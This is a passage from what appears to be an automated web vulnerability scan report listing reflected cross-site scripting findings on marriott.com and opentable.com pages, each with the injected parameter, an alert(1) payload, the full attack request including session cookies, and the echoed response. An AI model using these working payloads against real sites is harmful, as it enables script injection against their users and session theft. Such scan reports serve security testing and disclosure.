Path:   /search/submitSearch.mi

Issue detail

The value of the toDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3646"><img%20src%3da%20onerror%3dalert(1)>9b47fe00376 was submitted in the toDate parameter. This input was echoed as d3646"><img src=a onerror=alert(1)>9b47fe00376 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=d3646"><img%20src%3da%20onerror%3dalert(1)>9b47fe00376&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=none&corporateCode=&displayableIncentiveType_Number=&marriottBrands=all HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD171_prd3; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:58:22 GMT
Content-Length: 174526
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<input type="text" name="toDate" id="global-header-hotel-toDate" value="d3646"><img src=a onerror=alert(1)>9b47fe00376" maxlength="10" class="calendar-module-todate search-toDate" />
...[SNIP]...
4.55. https://www.marriott.com/reservation/availabilitySearch.mi [displayableIncentiveType_Number parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/availabilitySearch.mi

Issue detail

The value of the displayableIncentiveType_Number request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd24"><img%20src%3da%20onerror%3dalert(1)>93f0d6f20368e179d was submitted in the displayableIncentiveType_Number parameter. This input was echoed as afd24"><img src=a onerror=alert(1)>93f0d6f20368e179d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reservation/availabilitySearch.mi?isSearch=false&accountId=&fromDate=10%2F3%2F11&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=10%2F4%2F11&populateTodateFromFromDate=true&defaultToDateDays=1&numberOfNights=1&numberOfRooms=1&numberOfGuests=1&marriottRewardsNumber=&useRewardsPoints=false&clusterCode=none&corporateCode=&groupCode=&displayableIncentiveType_Number=afd24"><img%20src%3da%20onerror%3dalert(1)>93f0d6f20368e179d&btn-submit=&sSubmit=Search&section=availability&sSubmit=Search HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://www.marriott.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":3,"to":5,"c":"https://www.marriott.com/reservation/availability.mi","lc":{"d4":{"v":3,"s":true,"e":2}},"cd":4,"sd":4,"f":1317646586583}; MI_SITE=prod3; s_pers=%20s_lv%3D1317646762445%7C1412254762445%3B%20s_lv_s%3DFirst%2520Visit%7C1317648562445%3B

Response (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD170_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Pragma: no-cache
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 03 Oct 2011 13:09:43 GMT
Content-Length: 78948
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
<input id="hd_incentivesType_Number" type="hidden" value="afd24"><img src=a onerror=alert(1)>93f0d6f20368e179d" />
...[SNIP]...
4.56. http://www.opentable.com/interim.aspx [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf00e'%3balert(1)//25a9e3f968c was submitted in the d parameter. This input was echoed as cf00e';alert(1)//25a9e3f968c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PMcf00e'%3balert(1)//25a9e3f968c&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a53&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=7&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
alDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PMcf00e';alert(1)//25a9e3f968c&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
ResultProperties.InResult
...[SNIP]...
4.57. http://www.opentable.com/interim.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80c13'%3balert(1)//61446a4a109 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80c13';alert(1)//61446a4a109 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod&80c13'%3balert(1)//61446a4a109=1 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:04 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a04&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=47&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=12&vbefreg=12&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=47&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=47&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46366


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
= -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&80c13';alert(1)//61446a4a109=1&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2];
ResultProperties.InResults.Neighborhoods = new
...[SNIP]...
4.58. http://www.opentable.com/interim.aspx [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54687'%3balert(1)//b64a7ba4ada was submitted in the p parameter. This input was echoed as 54687';alert(1)//b64a7ba4ada in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=254687'%3balert(1)//b64a7ba4ada&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:52 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a52&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61d59b16cfdda46b784&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=o47%2fll%2bXzyhrFxOPTCorbQ%3d%3d&ts=27&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
